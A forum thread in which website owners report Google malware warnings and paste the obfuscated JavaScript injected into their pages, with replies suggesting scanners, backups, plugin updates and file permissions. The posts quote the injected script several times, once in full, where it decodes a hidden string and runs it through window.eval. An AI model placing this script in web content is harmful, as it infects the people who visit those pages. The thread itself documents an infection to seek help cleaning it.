Malware on the site as per google but I cannot find it

Hi

yesterday when I came to one of my sites I got a warning from google that there is malware on my site. I looked at the code and there was indeed some javascript that shouldn't be there. I googled it and didn't find anything usefull. When I came back to my site, that code was gone, but google (when accessing the site from the search engine) and google chrome still give me a warning that there is malware on my site.

I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:

<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?
^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!
^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@
$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+
&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]
&+&~

Code (markup):

Can you please help me out? How should I fight this?

Thank you all very much for your help in advance!

 

Update: Code appeared again, but then dissapeared right away.

here is the full code:

<script type='text/javascript'>st="en0no3nno3mpno3rxthuissno3rvno3rpno3rxcom";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]&+&~&^!*&]&*&_!+$)&:^]!!&:&_&+&~!!$)&!^]!+&?&:!^^@!+!$!:!@!&*!^]$$&!&*!+!^&*!++<!+!+!$&:!^&+&&$$^@!&&<!$$|&<^]*@*]^@&+!)!)$?&*^]$$^|$$$:^@&<$_!|!*!^&?$?$$&?&*&:&!&?!+$$$)$$!^!*&$!^!+!$&:&_&!$$$)$$!+!$&*&^!$&*&<!+&*+*&)&*&]&*&_!+&!&*!+$$$)$$!!&:&+!+&?$$$)$|$$!&&$&]&:&&!$!^&*!+$$$)!&*!$)$$&$&~&+!:$$$)$$&<!|!|&*&_&++^&?&:&)&+$$$)&*$)&&$)$$!^!$&^$$$:^@!&&<!$$|&#^]&<*@^$*]*@&<*@^<*]*]$?^^$)^<^&$:^@!&+@^]&<*@^+*]*@&<*@^<*]*]$?^^$)^&$:$@$$&<&]&*$$^@!|^]&<*@^**]*@&<*@^<*]*]$?^^$)^<^<$:$@$$&$!*!+&*$$^@!&&<!$$|&@^]&!$_&$$?$:$)&$^]&<*@^:*]*@&#*]$?!&+@$:^@&$*@&<*@^<^|*]*]^]&@^@&$*@&<*@^^*]*]^]&<*@^?*]^@&$*@&<*@^|*]*]^]&<*@^?*]^@&<*@^:*]*@&<*@^&*]*]*@&<*@^!*]*]$?&$$:!]&^&<!+&^&?$?&]$:!@&&$_!!!$&:!+&*$?$$^)&?!+&]&)^_^)&$&~&+!:^_^)$~&$&~&+!:^_^)$~&?!+&]&)^_$$$:$)&:$_!^&*!+*+&:&]&*&~!*!+$?&&!*&_&^!+&:&~&_$?$:!@&!$_&<$?$:!]$)^$^^^^$:!]!]!]^@!&&<!$$|&)^]&_&*!!$|&?^@&:&&$?!!&:&_&+&~!!$_&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&]&<!+&^&?$?$~&&&:!$&*&&&~!?!)&]!^&:&*$~&:$:$:!@&)$_&<$?$:^@!]$|&*&)!^&*$|!@$|&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&&!*&_&^!+&:&~&_$?$:!@&)$_&<$?$:^@&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&_!*&)&)!]!]!]^@"; function e(){e=a.join("$").split("%");for(var d in e)"string"==typeof e[d]&&(c=c.split(e[d].substr(1)).join(e[d].substr(0,1)));return this}var f=e(),a="";for(_E=~b-~b;_E<c.length/2;_E++)a+="%"+c.substr(2*_E,2);window.eval(f.decodeURIComponent(a));</script>

Code (markup):

How should I start fighting this? I have no idea where it's coming from and it goes away upon refresh :S

 

Did you scanned your host via Cpanel scanner?
Maybe you have backdoor on your site?
Check your site with Stopthehacker.com there is free subscription i think.

 

Maybe this is an iframe or a php.ini virus embedded inside your server.
Maybe i can help you on fixing that. It happen on my site before.

 

Have the exact same thing happen to me. Webmaster tools notified me, and i've literally spent two days trying to find this thing. PLEASE let me know if you can find anything.

My code: <script type='text/javascript'>st="en0no3nno3mpno3rxthuissno
3rvno3rpno3rxcom";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2
","%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:
&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?
&!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_
!^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<
!+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~
&~&@&:&*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$
&:&_&!$?$:$:$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$
&:&_&!$?$:$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^
!+$_!$&*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?
$~&_&~^^$~&!$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_
$$$:$@$$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:
&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_
&:&_&+&*!?+~&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_
&^!+&:&~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+
&:&~&_$?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@
!&&<

 

Your host can only restore the account from the backup or remove the code from the files, for permanent fix download the hosting account content on the local machine and scan it with the local machine antivirus and remove the infected files from hosting account and re-upload the content on the server.

Now upgrade the script as well as plugin/module hosted under your hosting account to latest secured patch and if possible remove the unused plugin/module , files,ftp accounts from the hosting account and make sure that files having 644 and directory having 755 permission, do not set the 777 full permission and nobody ownership to any file or directory as it allow hacker to upload the hacking script and inject to your hosting content like currently you are facing the problem.

By using the above steps, your hosting account is secure but if still you are facing the problem then change the server or host because many time on shared server other compromised hosting account cause such problem.

 

you can try and use Kyplex

 

i found some info here, but not enough any one else tell me?